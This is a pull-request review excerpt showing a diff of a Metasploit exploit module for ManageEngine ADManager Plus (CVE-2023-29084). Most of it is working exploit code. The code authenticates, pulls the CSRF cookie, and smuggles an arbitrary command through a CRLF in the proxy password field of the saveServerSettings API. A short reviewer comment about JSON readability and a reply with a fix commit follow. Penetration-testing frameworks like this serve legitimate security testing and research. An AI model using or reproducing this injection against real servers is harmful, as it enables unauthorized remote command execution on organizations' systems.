modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb

```diff
@@ -0,0 +1,221 @@
+    end
+
+    login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DOMAIN'])
+
+    # We need to do this post login otherwise we will get errors. This also ensures we get updated
+    # cookies post login as these can sometimes change post login process.
+    res = send_request_cgi(
+      'uri' => target_uri.path,
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code post authentication!')
+    end
+
+    # Check that we actually got our cookies updated post authentication and visiting the homepage.
+    unless res&.get_cookies&.match(/adscsrf=.*?;.*?;.*?_zcsr_tmp=.*?;/)
+      fail_with(Failure::UnexpectedReply, 'Target did not respond with the expected updated cookies after logging in and visiting the home page.')
+    end
+
+    @csrf_cookie = nil
+    for cookie in @cookie_jar&.cookies
+      if cookie.name == 'adscsrf'
+        @csrf_cookie = cookie.value
+        break
+      end
+    end
+
+    fail_with(Failure::NoAccess, 'Could not obtain adscrf cookie!') if @csrf_cookie.blank?
+
+    if target['Type'] == :win_dropper
+      execute_cmdstager
+    else
+      execute_command(payload.encoded)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'saveServerSettings'),
+        'method' => 'POST',
+        'vars_post' => {
+          'adscsrf' => @csrf_cookie,
+          'params' => create_params_value(cmd)
+        },
+        'keep_cookies' => true
+      }
+    )
+
+    if res && res.code == 200
+      if res.body&.match(/{"isAuthorized":false}/)
+        fail_with(Failure::NoAccess, 'Somehow we became unauthenticated during exploitation!')
+      elsif res.body&.match(/Successfully updated the following settings.*-.*Proxy Settings/)
+        print_warning("Settings successfully changed but the fact that the server responded likely means the payload didn't execute!")
+      elsif res.body&.match(/"status":"error"/)
+        print_error("The payload somehow triggered an error on the target's side!")
+      else
+        fail_with(Failure::PayloadFailed, 'Was not able to successfully update the settings to execute the payload!')
+      end
+    elsif res.nil?
+      print_good('Request timed out. Its likely the payload executed successfully!')
+    else
+      fail_with(Failure::UnexpectedReply, "Target responded with a non-200 OK code to our saveServerSettings request! Code was #{res.code}")
+    end
+  end
+
+  def create_params_value(cmd)
+    "[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"localhost\",\"USER_NAME\":\"#{Rex::Text.rand_text_alphanumeric(4..20)}\",\"PASSWORD\":\"#{Rex::Text.rand_text_alphanumeric(4..20)}\\r\\n#{cmd}\",\"PORT\":\"8080\"}]"
+  end
```

Comment:
Would you mind switching this to an array containing a hash and converting it to JSON? It'd be slightly easier to read without needing to escape the double quotes.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/18018/commits/ac99cb32711377646d30ce9bee39d1a0dcc6a2f4